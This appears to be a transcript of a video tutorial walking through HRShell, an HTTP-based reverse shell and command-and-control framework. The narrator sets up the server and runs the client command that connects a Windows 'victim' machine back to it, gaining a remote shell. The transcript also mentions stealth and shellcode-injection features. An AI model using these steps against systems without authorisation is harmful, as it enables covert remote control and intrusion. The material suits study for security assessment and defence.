Hello everyone. So in this video we are going to be taking a look at HRShell. It is a HTTP based reverse shell framework. So it is an advanced command and control framework that is going to help us with reverse shell using HTTP, and it has multiple features and capabilities. So let's take a look at its documentation page. Now HRShell is built using Python's Flask framework and is compatible with Python 3. The features it supports are: it is stealthy, it also enables TLS support, it also supports shellcode injection, it has proxy support for the client, it also has piping, navigation, etc. other features. So let's get started into the demonstration of using HRShell on gaining our reverse shell on the base system. So this server is going to be running on my VM, and we are going to be making our base system the client for this demonstration purpose. So go ahead and get that clone link. Go to your terminal, git clone, let's let it clone, navigate now. Let's take a look at the files. So it has requirements.txt. Let's go ahead and install them. Alright, so we have installed the requirements. Now, we saw that HRShell provides support for HTTPS certificates, so you can see that unless --HTTP option is specified, by default the server is going to be using HTTPS. So we are going to be generating the certificates using this OpenSSL. So let's copy this command into the defaults, and you can see that the certificate PEM files are generated. Alright, now for the demonstration purpose I'm not going to be using HTTPS. Let's run it over HTTP, but you can also go ahead and research on how to use HTTPS using HRShell. We will take a look at the help page, Python 3. Now you can see that --HTTP disables TLS and uses HTTP instead. So let's go ahead and set that flag up. Alright, so now that we have our server running, we need to be able to deliver the client file in some kind of a mechanism to the victim machine. Now in this demonstration we are going to make our victim machine our base Windows system, and we are going to be assuming that the client file has reached the victim machine and is getting executed. So let's first take a look at the IP of the server machine. Alright, so let's copy this, close this. Let's head back to our server machine, sorry, the victim machine. Alright, so just for demonstration purpose, it's Windows. So just for demonstration purpose, we'll be attacking this Windows system, which is my base machine. So go ahead and execute that client shell. Alright, now I have already installed the requirements, but you can go ahead and do it, it's not necessary. Now Python client.py -s http :/ the IP of our server machine and port 5000. And you can see that now I have gained a reverse shell over my victim machine. So let's go ahead and prove it. You can see this 120 192.168.29.1, which is exactly what we saw here. Alright, so go ahead, use this tool in your security assessments. It is one hell of a tool, and I am going to give it all the good ratings. So thank you for watching this video. Until then, happy hacking.